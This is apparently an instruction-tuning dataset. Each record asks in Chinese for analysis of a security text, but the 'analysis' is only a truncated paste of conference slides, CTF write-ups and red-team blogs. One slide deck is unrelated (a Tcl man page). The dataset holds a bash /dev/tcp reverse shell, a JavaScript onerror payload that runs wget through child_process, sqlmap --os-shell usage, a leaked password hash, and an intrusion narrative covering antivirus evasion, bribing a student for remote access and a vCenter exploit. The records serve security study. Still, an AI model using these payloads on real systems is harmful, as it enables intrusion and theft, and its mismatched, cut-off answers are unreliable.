{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhttp://null.co.in/ http://nullcon.net/ http://null.co.in/ Jugaad Linux Thread Injection Kit By Aseem Jakhar $whoami  A Big Hello from India.  Founder  null The open security community.  Organizer  nullcon security conference.  Chief researcher  Payatu Labs http://www.payatu.com  Speaker at various security conferences  Blackhat, Xcon, Gnunify, ISACA Blore, Cocon, Clubhack, Blore Cyber security Summit. http://null.co.in/ http://nullcon.net/ http://null.co.in/ null  Registered Non-Profit organization.  The largest security community in India.  Focus  security research, knowledge sharing.  6 chapters in India.  Monthly meets in all chapters.  Security awareness camps.  nullcon  The Favorite go-to destination for hackers and security professionals in the Indian sub- continent. http://null.co.in/ http://nullcon.net/ http://null.co.in/ Agenda  What is Jugaad  What Jugaad is not  Code Injection  Windows  Linux  ptrace() Primer  Library Injection  Jugaad  Conclusion http://null.co.in/ http://nullcon.net/ http://null.co.in/ What is Jugaad  Jugaad  Hindi word, means work- around/hack.  Code injection technique.  Threading capability.  Customized payload.  Jugaad in it's true sense. http://null.co.in/ http://nullcon.net/ http://null.co.in/ Agenda  What is Jugaad  What Jugaad is not  Code Injection  Windows  Linux  ptrace() Primer  Library Injection  Jugaad  Conclusion http://null.co.in/ http://nullcon.net/ http://null.co.in/ What Jugaad is not  Zero day.  Vulnerability.  Privilege escalation technique. http://null.co.in/ http://nullcon.net/ http://null.co.in/ Agenda  What is Jugaad  What Jugaad is not  Code Injection  Windows  Linux  ptrace() Primer  Library Injection  Jugaad  Conclusion http://null.co.in/ http://nullcon.net/ http://null.co.in/ Code Injection  Injecting executable instructions/code.  Altering the default flow of execution.  Buffer overflow  SQLi  XSS  XML  APIs http://null.co.in/ http://nullcon.net/ http://null.co.in/ Agenda  What is Jugaad  What Jugaad is not", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1995-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: fconfigure.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '\\\" Start of description of a specific option. cmdName gives t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Pwndoor - Rev (150 + 0), 5 solves > We found this implant on some of our servers, help us figure it out! In this task, we were given a small binary and host on which it was running. Note that we did not have a port, we had to figure it out ourselves. The binary is rather small. It first creates a raw socket, attaches a BPF filter to it, and then waits for any packet matching the filter to arrive. Then it sends the flag to the sender ip, on TCP port 4444. The only difficult thing there is to analyze the BPF filter. The tooling surrounding it is in pretty bad condition - we were not able to find a disassembler that would work correctly. In the end, we used the same approach as in http://www.gnoobz.com/hitb-ctf-2016-binary-300.html, that is using `/proc/sys/net/core/bpf_jit_enable`, which would translate the BPF to x64 code and dump it in `dmesg` output. Reverse engineering that wasn't too different from any other RE challenge. There were a couple of arithmetic checks on a couple of bytes of the packet. From these, we could conclude: - it has EtherType = 0x800, that is, it's IPv4, - it has protocol type = 17, i.e. UDP, - UDP port = 3333, - packet data must contain a certain text. From the packet data structure, we guessed it is a DNS packet (it had a couple of constants identical to DNS). The finally accepted packet was then generated by: `dig @34.245.139.8 -p 3333 'M4d!bKn3~l' TXT`, which after sending, caused the server to call us back on TCP port 4444.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSniffing cable modems Guy Martin <gmsoft@tuxicoman.be> Defcon 16 - Aug 2008  Las Vegas Agenda  What is DOCSIS ?  Use of DOCSIS  General architecture  Registration process  Encryption on the link  Cool, how can I sniff it ?  DVB-C card  Packet-o-matic to the rescue Agenda  Doable things  Privacy  Modem SNMP hacks  Misc  References  DOCSIS  MPEG  Packet-o-matic What is DOCSIS  Use of DOCSIS  Internet : The most known application of the DOCSIS protocol  Telephony : Most cable modems have a built-in ATA (Analog Telephone Adapter)  Digital TV decoders : built-in cable modems to monitor/feedback data from end users What is DOCSIS  General architecture  CMTS on the ISP side broadcast packets to end users on a common single frequency  Modems on end user side send packets back to CMTS on another frequency during its timeslot  A CMTS serves from a small neighborhood to a whole city  Downstream frequency is in the same range than TV ones  Uses MPEG packets like normal digital TV to encapsulate data What is DOCSIS  Registration process  Aquire and lock the downstream frequency  From this, find out the upstream parameters  Get an IP address  Download the modem configuration via TFTP  Apply the configuration and enable forwarding of packets What is DOCSIS  Encryption on the link  Encryption and authentication are NOT mandatory  BPI (Baseline Privacy Interface) provides a mechanism for authentication and/or encryption  DES and AES are the two possible encryption algorithms How to sniff it  DVB-C card  Possible because protocols and frequencies are purposely similar to digital TV ones  Inexpensive  Only the downstream traffic can be captured  Different hardware like USRP could be used to capture both upstream and downstream How to sniff it  Packet-o-matic to the rescue  Input module capture the traffic  Packets are processed and matched using match, helpers and conntrack modules  Eventually the target module process the packets to produce the desired output  Everything occurs real-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows 安全 - 服务篇1 0x00 前言 Windows安全范围真的很大我也仅仅是在学习路上的行人边学边记在自己学习的同时也希望有 一起的同行者我计划从Windows服务开始先学习windows服务的基础机制然后再学习相关的安全 问题然后记录这个过程中自己的一些思考或延申性研究这个过程中当然大量知识来自于网络公开 文献和深入理解Windows操作系统7 上下册 Windows服务架构简图 从简图看Windows服务的核心组件并不复杂用户通常通过SCP类程序例如sc.exe等来控制服务 应用但是他并不是直接控制的中间是通过SCM来控制的 0x02 基础组件 通过上图我们知道服务的核心组件有3个分别是服务应用服务控制程序SCP服务控制管理 SCM我们先学习下这3个核心组件 1. 服务应用 服务应用很好理解就是我们开发的可执行程序和通常的可执行程序不同服务可执行程序比普通可 执行程序多了接收SCM发送的命令的代码并返回给SCM服务当前的状态通常服务可执行程序没有 用户接口是终端程序说到这儿大家用过CobaltStrike就会发现生成植入体的时候CS有2种 windows可执行程序其中就有Service可执行程序专门用作创建服务时使用也就是说你创建服务 时候填入的可执行程序和普通可执行程序是不同的普通程序没有和SCM通讯的代码会导致服务启动 失败但是可以使用cmd.exe /c \"xxx.exe\"的方式来执行非服务可执行程序这样在服务启动的时候 cmd.exe由于不能和SCM通信进程会被终止但是其子进程xxx.exe不会被终止依旧执行这儿需要 注意的是xxx.exe不能是有用户接口的程序例如calc.exe这样的程序需要是终端程序这是什么原 因呢这个和session隔离有关后面说 服务应用是运行在服务进程当中的一个服务进程中可以有多个服务应用因此服务进程分为独占型和 分享型 Produced by AttackTeamFamily - Author: L.N. - Date: 2022-04-06 No. 1 / 2 - Welcome to www.red-team.cn 2. 服务控制程序SCP 服务控制程序我们用的比较多的是sc.exe和services.msc他们底层其实调用的都是相同的APISCP 主要和SCM通信如果把SCM比作一个服务端SCP就是它的客户端scp通过scm间接的去控制服务进 程SCP其实就是一系列和SCM通信的API这些API一部分在Advapi32.dll中例如CreateService Advapi32.dll中只是一小部分API大部分API还是在Sechost.dll中Advapi32.dll中很多api都是封装的 Sechost.dll因此我们想控制Windows服务除了用services.msc这种交互式方式或者sc.exe这种命令 行的方式以外还可以直接调用API自己实现相关程序 SCP用于管理SCM服务的函数有CreateServiceOpenServiceStartServiceControlService QueryServiceStatusDeleteService在使用这些函数管理SCM服务前需要使用OpenSCManager函 数打开SCM句柄当然不是谁都能使用OpenSCManager打开SCM句柄的是需要权限的看到这儿 有经验的同学应该遇见过OpenSCManager error 5这样的错误特别是在使用类psexec方式进行横向 移动的时候这个错误的原因就是权限不够使用OpenSCManager不能打开SCM的服务句柄也就不 能对服务进行操作 3. 服务控制管理SCM SCM是Windows服务最核心的部分它直接和服务进程通信它是服务真正的控制者下图能够很好的 表示它和服务进程的通信状态 SCM的可执行文件时%SystemRoot%\\System32\\Services.exe在系统启动阶段SCM就启动了SCM启 动的详细流程以及SCM如何控制其他服务启动的方式均在深入windows操作系统7下册的446-447页 ps:目前只有英文版 0x03 总结 这个系列文档大多比半笔记的形式编写因此有点想到哪儿写到哪儿不会扣每一个细节Windows服 务的相关利用在红队中非常常见很多技术都有涉及时非常有必要深入了解和学习的 Produced by AttackTeamFamily - Author: L.N. - Date: 2022-04-06 No. 2 / 2 - Welcome to www.red-team.cn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n程聪 阿里云安全-系统安全专家 基 于 硬 件 虚 拟 化 技 术 的 新 一 代 二 进 制 分 析 利 器 自我介绍 现就职于阿里云安全-系统安全团队 主要研究方向:  病毒检测  主机安全  内核安全  虚拟化安全  二进制攻防 演讲内容  背景介绍  QEMU/KVM简介  无影子页ept hook  虚拟化调试器  内核级trace  总结 背景介绍 大家先来看下左边这张图片搞内核安全的应该不陌 生windows x64内核引入patchguard后对内核 敏感部分进行patchhook修改msrIDT表等 操作都会触发蓝屏 从PatchGuard谈起 但是有很多场景还是需要对内核进行hook安全研 究人员发现可以借助硬件虚拟化特性实现ept hook 来兼容patchguard 传统的ept hook一般使用影子页来实现我们发现这 种方法存在一些问题本次分享会介绍一种新方法 巧妙解决这些问题 要实现ept hook首先需要一个类似左图的虚拟化平 台提供整体的框架 虚拟化平台 从图中能看出开发一个完整的vmm工作量太大所 以我们选择基于现有的虚拟化平台进行二次开发但 一些专注安全领域的开源平台如hyperplatform或 多或少都存在各种各样的问题最终我们选择了基于 qemu\\kvm做二次开发 本次分享会介绍如何基于qemu\\kvm快速打造无影 子页ept hook虚拟化调试器内核级trace工具 vcpu manager memory manager device manager interrupts paravirtualization vmm   代码完善度高鲁棒性好稳定性高性能开销小  支持windowslinux等多种guest os  背靠linux内核各种基础设施齐全方便二次开发  在云上广泛使用环境不会被特殊针对  支持gpu透传和虚拟化可以运行图形化程序  支持嵌套虚拟化可以运行vmm程序 为什么选择QEMU/KVM 相比于hyperplatform等虚拟化平台qemu\\kvm有以下优势 QEMU/KVM简介 QEMU/KVM整体架构 如左图所示guest操作系统在(ring 0)上运行同时 vmm运行在具有更高特权级别(ring -1) 上执行系 统调用等不涉及关键指令的指令vmm不会介入这 样guest操作系统就可以为其应用程序提供高性能的 内核服务当guest使用特权指令(比如cpuid)或者 发生异常时会产生vmexit从guest退出到host中 host处理完成后再通过vmentry回到guest cpu虚拟化 HPA PA HVA G 内存虚拟化 没有虚拟化的情况下内存地址翻译如左图所示只有VA->PA virtual machine1 process1 VA G <--CR3 EPT--> qemu linux host 在存在虚拟化的情况下GVA->GPA的翻译发生在虚拟机内部 GPA并不是最终的物理内存还需要通过EPT翻译成HPA才完 成整个内存访问 qemu的HVA也映射为HPA所以一般来 说GPA对应着qemu的HVA EPT翻译过程跟普通页表类似也是通过多 级页表实现手动去掉页表项某些权限就 可以达到监控和欺骗的目的 EPT相关操作都在host上进行对guest内核 和应用程序不可见从而可以进行降维打击 无影子页ept hook 影子页ept hook  如右图我们在原始页页面的基础上创建 一个只有X权限影子页原始页保留RW权限 并在影子页上进行hook修改头部指令为jmp  当有cpu执行此页时就会触发hook逻辑  当有cpu读取此页时由于影子页只有X权限 会产生ept violation从而vmexit到hosthost 将页面切换成原始页(RW)进行读写cpu会读取到 原始的内容我们达到了欺骗(无痕)的效果  下次cpu再执行原始页(RW)时同样会触发异常 我们再将页面切换回影子页(X)执行 这种方法存在什么问题 存在的问题  在影子页(X)上执行mov rcx,[rip]时会读 取当前页面由于当前页面只有X权限 会产生异常并切换到原始页(RW)去执行 读取由于RW页没有X权限又会产生异 常并切换回影子页(X)来回切换进入死锁 遇到右图自己读写自身页面的指令会怎么样 这种读写自身页面的场景很常见比如  switch case语句在某些情况下会在当前 代码页面编译生成jump table这种情 况在windows内核中很常见  代码自修改这种在用户态中比较常见 比如一些壳对抗代码中 我们如何改进 改进后的解决方案 如右图所示改进后的方案不去除原始页的X权 限遇到页面自读写的指令从X切换到RWX 原始页可顺利执行此指令 在执行完此指令后我们需要切换回影子页(X) 否则", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAir Traffic Control I it 2 0 Insecurity 2.0 Righter Kunkel, CISSP, CISA Security Researcher DEF CON 18 DEF CON 18 Agenda  Who am I?  Overview from last year y  Insecurity's today  Jet tracking  Jet tracking DEF CON 18 Righter Kunkel 2 Who am I?  Security Field for >13 years  Worked with secure operating p g systems: B1, B2  Firewalls, proxies , p  Trainer  CISSP, CISA  CISSP, CISA  Ham Radio  Private Pilot  Private Pilot  DEF CON presenter last year DEF CON 18 Righter Kunkel 3 First  Is flying safe? YES  Are planes going to fall out of the p g g sky after this talk? NO  Is flying safe after this talk? YES y g  Is some of this talk illegal? ??? Disclaimer: Dont do this! DEF CON 18 Righter Kunkel 4 Pilots?  Is any one a pilot? DEF CON 18 Righter Kunkel 5 Our Focus  We are not going to focus on:  Airport physical security  Cockpit door security  X-Ray security  Our focus:  Computers used by ATC  How airplanes report their position to ATC NexGen ATC  NexGen ATC DEF CON 18 Righter Kunkel 6 Why?  ATC is busy moving planes through the air  ATC not focused on network security of equipment being used  Who would want to hack a radar scope? DEF CON 18 Righter Kunkel 7 ATC  What is ATC? DEF CON 18 Righter Kunkel 8 Source: GAO/T-AIMD-00-330 FAA Computer Security NextGen ATC  Converting from proprietary hardware to commercial off the shelf hardware  Phasing out radar  Airplanes transponder will report Lat., Long., and Alt. in clear txt  ADS-B DEF CON 18 Righter Kunkel 9 Airplane Transponder Source: Wikipedia Righter Kunkel 10 DEF CON 18 ADS-B Insecurity  Who am I and where am I in one unencrypted packet  GPS will be the backbone of NextGen  Oh, and GPS sats are failing faster than expected O ld il f k S  One could easily fake an ADS-B transmission N d t if t iti  No radar to verify true position DEF CON 18 Righter Kunkel 11  More to come DEF CON 18 Righter Kunkel 12 Call to Action  Listen to ATC  View ADS-B broadcasts  Become a Pilot DEF CON 18 Righter Kunkel 13 Conclusion  ATC B", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGo With the Flow Enforcing Program Behavior Through Syscall Sequences and Origins Claudio Canella (@cc0x1f) August 11, 2022 Graz University of Technology Who am I? Claudio Canella PhD Candidate @ Graz University of Technology @cc0x1f claudio.canella@iaik.tugraz.at 1 Claudio Canella (@cc0x1f) 2002 2004 2006 2008 2010 2012 2014 2016 2018 2020 2022 0 0.5 1 1.5 2 104 2,1561,527 2,451 4,935 6,6106,520 5,6325,736 4,6534,155 5,2975,191 7,939 6,5046,454 14,714 16,55717,344 18,325 20,149 15,044 Year Vulnerabilities1 1Source: http://www.cvedetails.com/vulnerabilities-by-types.php 2 Claudio Canella (@cc0x1f) What to do? Eliminate bugs 3 Claudio Canella (@cc0x1f) What to do? Eliminate bugs Limit Post-Exploitation Impact 3 Claudio Canella (@cc0x1f) What to do? Eliminate bugs Limit Post-Exploitation Impact 3 Claudio Canella (@cc0x1f) Control-Flow Integrity 1 2 3 4 5 6 control flow 4 Claudio Canella (@cc0x1f) Control-Flow Integrity 1 2 3 4 5 6 Allow: 3  [5,6] Deny: 3  ![5,6] control flow CFI check 4 Claudio Canella (@cc0x1f) Control-Flow Integrity 1 2 3 4 5 6 Allow: 3  [5,6] Deny: 3  ![5,6] control flow CFI check malicious flow 4 Claudio Canella (@cc0x1f) Control-Flow Integrity 1 2 3 4 5 6 Allow: 3  [5,6] Deny: 3  ![5,6] control flow CFI check malicious flow 4 Claudio Canella (@cc0x1f) Linux Seccomp Kernel App. 5 Claudio Canella (@cc0x1f) Linux Seccomp Kernel App. Filter install 5 Claudio Canella (@cc0x1f) Linux Seccomp Kernel App. Filter System Call 5 Claudio Canella (@cc0x1f) Linux Seccomp no Kernel App. Filter terminate System Call 5 Claudio Canella (@cc0x1f) Linux Seccomp no Kernel App. Filter terminate System Call System Call 5 Claudio Canella (@cc0x1f) Linux Seccomp no Kernel App. Filter terminate System Call System Call return 5 Claudio Canella (@cc0x1f) Sample 6 Claudio Canella (@cc0x1f) Sample Syscalls: 0 1 2 3 16 19 20 60 72 202 231 6 Claudio Canella (@cc0x1f) Syscall-Flow-Integrity Protection 7 Claudio Canella (@cc0x1f) Syscall-Flow-Integrity Protection State Machine 7 Claudi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 前 作者J0o1ey有技术交流或渗透测试/Redteam培训需求的朋友欢迎联系QQ/VX-547006660 本简单记述了下本在某攻防演练过程中次层层突破的有趣经历 技术性般但是层层突破属实艰难并到了较多的思路还望各位佬多多指教 0x01 SSO账号获取 由于标是某学对外开放的服务基本上都是些静态Web没什么太多利点 因此获取个该学的SSO账号就显得尤为重要~ 本使该学的域名以及常的搜索密码关键词调Github的api在Github中定位到了就读该学的关键 户 该同学安全意识较为薄弱经常将账号密码硬编码在程序内这正是我们苦苦寻觅的才 结合他在其他项中硬编码的学号我们成功利他的学号+密码登陆该学SSO系统和学vpn系统 本来以为可以进驻内了结果发现学VPN除了访问些学术资源啥也不了 好在进去SSO了那么后接近靶标之路就会更加轻松现在然要把着点放在SSO能访问到的系统漏洞挖掘上 0x02 某系统接利测试tips获取量信息 了遍SSO能访问的系统 发现某项申请处可以搜索学校其他同学的信息 如图接在流量中是这样表现的 我们利个测试tips将其中的关键键置空或者使通配符*发现可以成功返回全校三万多名学的信息 凭此成果仅能得点可怜的分数还得继续来撸 我继续在系统重翻找接终于发现了个可以搜索学校师的接 同样的使刚刚的tips在关键的键处置空键值或使*这次运很好返回的信息中甚出现了所有师的 号和md5加密的密码 甚包括sso管理员的密码 解了下admin的密码常遗憾解不开不然游戏就直接结束了~ 但我们现在掌握了量师的号密码(包括负责运维的师)那么我们后进驻内的作就会顺利很多 0x03 进驻DMZ区并获取内跳板 我们做了很时间的信息搜集找到了该学校开放在外给运维员使的DMZ区VPN 我们直接刚刚获取到负责运维的师的账号密码登录发现直不好使... 结果试了下发现密码竟然和号是致的....真是语... 随后就成功接了该学校DMZ区VPN 进DMZ区后我们简单做了下弱令扫描探测发现了台SqlServer的弱令 直接通过恢复执xp_cmdshell发现还是管理员权限 但是列进程的时候发现了万恶的某60 试了试之前的certutil下载件绕过法因为之前交了360SRC已经被修复了TMD直接被拦 但是仔细想SqlServer中是存在LOL bin的可以实现利执powershell 通过此姿势成功上线CS 如此来访问内核区的跳板就有了~ 0x04 被踢出内与收买学校内 还没等开会突然发现CS的进程已经被下掉了并且DMZ区账号也被踢下线并改密码了 估计是标机有主机安全设备检测到了进程中的CS内存特征或流量特征 线索全断让陷了沉思不过转念想内代理套代理也是卡的要死还不如想想办法如何直接获取内核 区的访问权限 我们于是在咸上开始寻找猎物发现了就读于该学的某学 该学咸上挂的具体内容忘记截图了体意思是我是xxx学的学可以为家提供xxx学的有关帮助 考研活等等等视难度收费10-50 我们直接加他联系式给他转了50 话术如下 LOL bin C:\\Program files (x86)\\Microsoft SQL Server\\xxx\\Tools\\Binn\\SQLPS.exe C:\\Program files (x86)\\Microsoft SQL Server\\xxx\\Tools\\Binn\\SQLPS.exe whoami 就这样我们连上了这个傻的向葵 然后直接他的cmd把权限给到CS做好权限维持 我你好你好我是xx学的学现在在外回不去学校想下你的电脑访问学校内的教务系统给您50元答 谢 对哦哦可以你看看怎么整 我你下个向葵然后把主机号和密码发给我就好 对okok 把隧道传出来发现学的PC竟然可以直接访问核区随后在内开始了扫描撸了些乱七糟的系 统如海康某设备的RCEweb系统的注关等等东但都没法反弹shell 当时发现了个SSH弱令可给我们兴坏了话不说连过去 当看到这幕的时候身冷汗因为常清楚踩到内蜜罐了要寄了 果然不出20分钟那位同学就发来了微信 煞我也后想继续钱收买道了歉说不传错软件了给他转了20块钱想再阵 可谁知 煞我也竟然不讲武德 0x05 近源渗透直捣 眼看着所有能通向内核区的路径全寄了我们只能想办法出奇制胜摇去近源渗透 叫甲派了了个混进学校内的图书馆之前获取到的学sso账号接校园 如此来我们就有了稳定且不易察觉的内通道 接下来就是常规操作了漏扫核段发现了docker api未授权和vcenter的RCE 可控制数个镜像 核区VCenter存在CVE-2021-21972漏洞可直接写Webshell 随后可利Vcenter的shell权限实现cookie伪造 使脚本 https://github.com/horizon3ai/vcenter_saml_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn ACE Up the Sleeve Designing Active Directory DACL Backdoors Andy Robbins and Will Schroeder SpecterOps @_wald0  ...  Job: Adversary Resilience Lead at SpecterOps  Co-founder/developer: BloodHound  Trainer: BlackHat 2016  Presenter: DEF CON, DerbyCon, ekoparty, Paranoia, ISSA Intl, ISC2 World Congress, various Security BSides  Other: ask me about ACH @harmj0y  Job: Offensive Engineer at SpecterOps  Co-founder/developer: Veil-Framework, Empire/EmPyre, PowerView/PowerUp, BloodHound, KeeThief  Trainer: BlackHat 2014-2016  Presenter: DEF CON, DerbyCon, ShmooCon, Troopers, BlueHat Israel, various BSides  Other: PowerSploit developer and Microsoft PowerShell MVP tl;dr  DACL/ACE Background  Enumeration of AD DACLs  DACL Misconfiguration and Abuse  Analysis with BloodHound  Designing ACL Based Backdoors  Case Studies and Demos  Defenses Disclaimer  There is no exploit/CVE/whatnot here, just ways to purposely implement Active Directory DACL misconfigurations  These backdoors are post-elevation techniques that require some type of elevated access to the objects youre manipulating Why Care?  Its often difficult to determine whether a specific AD DACL misconfiguration was set maliciously or configured by accident  These changes also have a minimal forensic footprint and often survive OS and domain functional level upgrades  This makes them a great chance for subtle, long-term domain persistence!  These may have been in your environment for YEARS! As an offensive researcher, if you can dream it, someone has likely already done it...and that someone isnt the kind of person who speaks at security cons Matt Graeber Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor - BlackHat 2015 Background From ACLs to ACEs 1. https://www.sstic.org/2014/presentation/chemins_de_controle_active_directory/ Previous Work Previous Work https://www.sstic.org/2014/presentation/chemins_de_controle_active_directory/ Previous Work https://blogs.tec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows Kernel Programming, Second Edition Pavel Yosifovich This book is for sale at http://leanpub.com/windowskernelprogrammingsecondedition This version was published on 2022-01-22 This is a Leanpub book. Leanpub empowers authors and publishers with the Lean Publishing process. Lean Publishing is the act of publishing an in-progress ebook using lightweight tools and many iterations to get reader feedback, pivot until you have the right book and build traction once you do.  2020 - 2022 Pavel Yosifovich Contents Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Who Should Read This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 What You Should Know to Use This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Book Contents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Sample Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 Chapter 1: Windows Internals Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Virtual Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 Page States . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 System Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 Thread Stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 System Services (a.k.a. System Calls) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 General System Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Handles and Objects . . . . . . . . . ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n回顾下goby反制讨论的些技巧做个记录 限制前提 1. 动转写 2. 不能有空格 群友提供的些思路 ftk提供的 r4提供的win下的 7师傅提供的数组式不过不知道为啥我的shell好像不 ftk提供的利已经有的命令切割其中字符最终获得空格不过id的话需要知道户名得找个别的命令 较完整的 js 我有点弱智我能注javascript我却在那边绕shell 所以使javascript的些编码就可以了如base64url编码等就不再说了 我还整了个没啥的 onerror=\\\"x=('a'+''['concat'])[9];cmd='/usr/local/bin/wget'+x+'127.0.0.1/1';require('child_process').exec(cmd);\\\"> 其实也是从js的个对象打印出来的字符串获取空格罢了 然失败了可能是我浏览器的上下和electron不太样搁置 打开浏览器调试", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnmap -sC -sV 10.10.10.46   sudo zip2john backup.zip > hash sudo john -w /usr/share/wordlists/rockyou.txt hash //zip2johnziphashjohn //wordlistskalirockyou.txt hack the box-Shield 0x00    sudo john --format=Raw-MD5 --fork=4 -w=/usr/share/wordlists/rockyou.txt hashmd5 //md5Raw-MD5  sudo sqlmap -r 46search.sql -p search 0x01 sudo sqlmap -r 46search.sql -p search --os-shell  //bashsqlmapoutputnoshellsqlmap bash -c 'bash -i >& /dev/tcp/10.10.16.2/4444 0>&1' nc -lvnp 4444  SHELL=/bin/bash script -q /dev/null Ctrl-Z stty raw -echo fg reset xterm cat /var/www/html/dashboard.php  sudo -l 0x03   :!/bin/bash   simon:$6$HmDDB89I3xFM2mJe$DNf5vRLvByV6U4VND/p2VfYYX8/s5apU3j3gk/2Y7A6Q8adNfDKHBFhw71i1gJ7kRUO7rqFX90h3sp4O6K1p20:1829 5:0:99999:7:::  0x04", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPwned by the Owner Zoz Months! Fuck! Fuck! ...time passes... WTF! % nslookup 72.193.81.105 Server:127.0.0.1 Address:127.0.0.1#53 Non-authoritative answer: 105.81.193.72.in-addr.arpaname = ip72-193-81-105.lv.lv.cox.net. Authoritative answers can be found from: 81.193.72.in-addr.arpanameserver = ns.cox.net. 81.193.72.in-addr.arpanameserver = ns.east.cox.net. 81.193.72.in-addr.arpanameserver = ns.west.cox.net. ns.cox.netinternet address = 68.1.16.107 ns.east.cox.netinternet address = 68.1.16.108 ns.west.cox.netinternet address = 68.111.106.68 % ping -t 60 fear-and-loathing.cannytrophic.com PING fear-and-loathing.cannytrophic.com (72.193.81.105) 56(84) bytes of data. --- fear-and-loathing.cannytrophic.com ping statistics --- 60 packets transmitted, 0 received, 100% packet loss, time 60998ms % while (1) while? ping -t 60 fear-and-loathing.cannytrophic.com while? end PING fear-and-loathing.cannytrophic.com (72.193.81.105): 56 data bytes 64 bytes from 72.193.81.105: icmp_seq=0 ttl=50 time=587.550 ms 64 bytes from 72.193.81.105: icmp_seq=1 ttl=50 time=616.106 ms 64 bytes from 72.193.81.105: icmp_seq=2 ttl=50 time=579.045 ms 64 bytes from 72.193.81.105: icmp_seq=3 ttl=50 time=535.899 ms 64 bytes from 72.193.81.105: icmp_seq=4 ttl=50 time=611.475 ms 64 bytes from 72.193.81.105: icmp_seq=5 ttl=50 time=580.169 ms 64 bytes from 72.193.81.105: icmp_seq=6 ttl=50 time=624.006 ms 64 bytes from 72.193.81.105: icmp_seq=7 ttl=50 time=692.520 ms 64 bytes from 72.193.81.105: icmp_seq=8 ttl=50 time=606.340 ms 64 bytes from 72.193.81.105: icmp_seq=9 ttl=50 time=536.899 ms 64 bytes from 72.193.81.105: icmp_seq=10 ttl=50 time=518.204 ms 64 bytes from 72.193.81.105: icmp_seq=11 ttl=50 time=605.183 ms 64 bytes from 72.193.81.105: icmp_seq=12 ttl=50 time=577.075 ms 64 bytes from 72.193.81.105: icmp_seq=13 ttl=50 time=704.004 ms 64 bytes from 72.193.81.105: icmp_seq=14 ttl=50 time=642.844 ms 64 bytes from 72.193.81.105: icmp_seq=15 ttl=50 